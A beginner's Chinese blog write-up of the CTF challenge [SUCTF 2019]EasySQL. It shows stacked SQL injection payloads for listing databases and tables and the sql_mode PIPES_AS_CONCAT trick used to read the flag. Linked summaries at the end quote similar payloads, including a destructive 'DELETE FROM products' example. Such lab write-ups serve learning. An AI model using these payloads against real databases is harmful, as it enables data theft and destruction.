[SUCTF 2019]EasySQL 1 菜鸟做题总结

最新推荐文章于 2024-05-15 02:27:01 发布
最新推荐文章于 2024-05-15 02:27:01 发布
阅读量1.7k 收藏 14
点赞数 7
分类专栏: ctf-web 文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/World1989/article/details/127246697
版权

题目内容
这是笔者第一篇记录web安全的博客,目前水平是刚起步阶段,但是以前做过web开发,所以对一些漏洞形成的原因比较了解,所以这一类博客将会是一个总结经验和做题过程的记录。

由于才开始做题,所以碰到这个sql注入其实并不知道该如何下手,这一点很痛苦。我只能按照目前学的摸索。
第一个想法,就说判断字符型和数字型,然后用1’ or 1=1这类去尝试,然后发现or和and被过滤勒,接着就是在网上找如何绕过and和or等,发现使用1 || 1=1#可以正常回显,但是好像对后续工作起不到什么用,因为我想使用order by,union等联合查询时,都被过滤勒,网上找了下绕过方式,还是不能绕过,到这里就卡住勒,然后就去百度这道题,看了关键字堆叠注入。想起了才做个的[强网杯 2019]随便注 1(用到了堆叠注入),嗯,自己都没想到,太菜了…

#构造 1;show databases;#
/*回显:Array ( [0] => 1 ) Array ( [0] => ctf ) Array ( [0] => ctftraining ) 
Array ( [0] => information_schema ) Array ( [0] => mysql ) 
Array ( [0] => performance_schema ) Array ( [0] => test ) */

#继续爆tables:1;show tables;#
#回显:Array ( [0] => 1 ) Array ( [0] => Flag ) 
#到这里flag就在这个表里了
#继续爆列名:1;show columns from Flag;#
#回显:Nonono

到这里其实就明显感觉新手的弊端暴露了,知道的方法太少了,一条路卡着就容易卡死,接下来就是去百度学习别人的做法,下面是一些经验积累。

#后端既然能做到数字回显字母不回显,说明有一个 或 结构,
#而且不直接回显flag,但作为一道题目,from一定是from flag。   摘自博客:StevenOnesir
select $_POST['query'] || flag from flag

1.做的题太少,我思维局限于sql注入发生于where条件之后的注入,所以才会第一反应去尝试数字型和字符型的判断,我还以为这道题是一个数字型的,其实压根就完全不是这么一回事。。。是一道后端代码拼凑

2.知识点总结

/*
sql_mode 设置了 PIPES_AS_CONCAT 时,|| 就是字符串连接符,相当于CONCAT() 函数
当 sql_mode 没有设置 PIPES_AS_CONCAT 时 (默认没有设置),|| 就是逻辑或,相当于OR函数
堆叠注入知识:
command1;command2          顺序执行
command1 || command2     如果command1执行失败,则执行command2(这里||是逻辑或)
command1 && command2      如果command1执行成功,则执行command2

所以select $_POST['query'] || flag from flag 我们输入数字可以,但是字符串不行,
因为如果是字符串相当于是字段名,但是Flag表里没有你随机输入的字段名
方法一:
所以可以构建 *,1,后端语句就是--select *,1 || flag from flag

方法二:
Payload:1;set sql_mode=PIPES_AS_CONCAT;select 1
后端语句:select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag
其实等于:select concat(1,flag) from Flag
*/

这一道题启发很大,主要是之前做的题全是where后面条件username于password等形式,第一次做在select 之后注入的题,经验
1.后端构造猜测
2.||在sql中可以有两种用法,需要根据sql_mode=PIPES_AS_CONCAT设置

本篇参考:
https://blog.csdn.net/bring_coco/article/details/108737434
https://blog.csdn.net/StevenOnesir/article/details/110203051?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-110203051-blog-108737434.t0_edu_mix&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-110203051-blog-108737434.t0_edu_mix&utm_relevant_index=1

One world
关注
  • 7
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SUCTF 2019] web题-EasySQL
BROTHERYY的博客
06-29 444
SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句 后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。 而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么? 区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句, 而堆叠注入可以执行的是任意的语句。例如以下这个例子。 用户输入:1; DELETE FROM products服务器端生成的sql语句为: (因未对输入的参数进
[SUCTF 2019]EasySQL
夜幕下的灯火阑珊的博客
05-11 621
知识点 堆叠注入 sql_mode 打开题目,如图 堆叠注入 查库 1;show databases; 查表 1;show tables; 查Flag 1;show columns from Flag; wp给的payload payload:1;set sql_mode=PIPES_AS_CONCAT;SELECT 1 修改sql_mode,将其设置为PIPES_AS_CONCAT,作用是将"||"作为字符串连接符而非或运算符,修改后实际语句为 SELECT 1;set sql_mod
BUUCTF - [SUCTF 2019]EasySQL1
白帽子续命指南
04-26 7218
猜测后端执行语句 测试环境:BUUCTF - [SUCTF 2019]EasySQL1 通过测试发现,输入数字的时候,页面回显 输入字母页面就没有回显 而尝试执行注入语句的时候,会显示一个nonono 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。而且注入点就是这个POST参数框框,就是那个inject参数。 至少我们可以把精力全部放在这个参数上。...
BUUCTF-[SUCTF 2019]EasySQL1
Monica的博客
09-09 2767
题目: 分析: 先尝试输入。 输入非0数字的时候会有一个回显 输入大小写字母的时候没有回显 判断是什么闭合:输入1#能输出,而输入 1' 和1'#没有输出,"被过滤掉,大致上可以按照数字型进行猜测。 输入特殊字符也没有报错回显,所以报错注入基本上没戏了 输入很多关于sql语句的东西(and,or,union,if,order from )都会显示Nonono,所以联合查询也没戏 再尝试时间盲注 ,sleep也被ban了,时间盲注也不行 再尝...
网络安全最新Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结(1),分布式架构演进+相关笔记参考
最新发布
2401_84254087的博客
05-15 1058
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
[SUCTF 2019]EasySQL1 题目分析与详解
2302_79800344的博客
02-24 2676
EasySQL
BUUCTF [SUCTF 2019]EasySQL1 writeup(详细版)
热门推荐
m0_62851980的博客
04-10 1万+
考点:堆叠注入,MySQL和mssql中||运算符的区别,运算符的意义转换(操作符重置) 打开靶机,尝试输入1查看回显: 可以看到表格回显了内容:1,用其他非0数字尝试全都回显1,那我们换个数字尝试,比如0: 什么都没有。 使用Sql堆叠注入查看信息,先用show指令查看数据库:1;show databases; 再查看一下表:1;show tables; 看到Flag表,猜测flag应该在Flag中。 但是直接select flag from Flag查询是查不...
[SUCTF 2019]EasySQL1
bring_coco的博客
09-22 7853
目标]Sql语句的堆叠注入[环境]Buuctf[工具]浏览器[分析]1.试试sql注入正常套路(1)先试试1有回显(2)再试试字母没有回显(3)试试单引号注入提示不一样,因此猜测这里有注入点(4)试试有多少列还是不成功,因此一般的联合查询在这里不能使用(5)基于时间的盲注和报错注入都需要嵌套联合查询语句来实现,因此可以跳过,直接试试布尔型盲注还是不成功2.利用堆叠注入(1)查找所有数据库(2)查询所有表名(3)查询Flag表中的列。
[SUCTF 2019]EasySQL 1
tomatoff的博客
04-14 3468
1、进入页面,又是一道注入的题; 2、分别尝试了下输入不同的内容: (1)输入数字1 (2)输入字母a或者带引号的组合1’ (3)输入双引号的组合1" (4)输入a’ or ‘1’=‘1 判断代码对一部分字符进行了过滤; 3、 ...
菜鸟虚怀项目笔试题(1).docx
09-05
### 菜鸟虚怀项目笔试题解析 #### 题目一:合并有序链表 **题目背景:** 此题考察的是数据结构中的链表操作。题目要求将两个已经排序(升序)的单链表合并为一个新的有序链表。 **题目分析:** 根据给定的代码...
大厂真题之菜鸟网络-Java初级.pdf
01-29
Java 基础知识点总结 以下是关于 Java 基础知识点的总结,包括 ==、equals 和 hashCode 的区别、基本数据类型、多态、字符串类、内部类等。 1. ==、equals 和 hashCode 的区别 在 Java 中,==、equals 和 ...
菜鸟进阶之路 ——关于VS2019环境中e1696错误提示的处理经验
01-08
菜鸟进阶之路 ——关于VS2019环境中e1696错误提示的处理经验 我想很多安装了vs2019的小伙伴们应该会和我一样遇到代码为e1696的错误提醒,那我们在 学习c语言的时候,首先要考虑的便是我们的环境了,所以环境的正确...
runoob菜鸟教程20190308.part1
03-11
runoob菜鸟教程20190308.part1 最新超全w3school菜鸟教程2019版,chm格式,全网唯一的一份,共享出来了 需下载完runoob菜鸟教程20190308.part1.rar和runoob菜鸟教程20190308.part2.rar两个文档才能解压 共700M
菜鸟的自我修炼——阿里巴巴一道笔试题浅谈
12-21
1. **基础语法**:Java的基础语法是所有程序员必须掌握的,包括变量、数据类型、运算符、流程控制(如if、switch、for、while等)以及函数的使用。一道简单的笔试题可能就是对这些基础知识的直接考察。 2. **面向...
BUU ctf [SUCTF 2019]EasySQL 1
m0_62879498的博客
03-11 2094
[SUCTF 2019]EasySQL 1 本题是 EasySQL 但是我感觉一点都不简单 。 我们打开界面发现很像上一关的随便注,但是我尝试了 联合查询 报错注入 布尔盲注 堆叠注入 发现都不能查询到 flag 。仅仅堆叠注入可以查询的 tables 一级。 查询过大佬的博客后发现本题考查的是 sql_mode sql_mode:是一组mysql支持的基本语法及校验规则 PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数
Buuctf-Web-[极客大挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 9266
SQL注入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值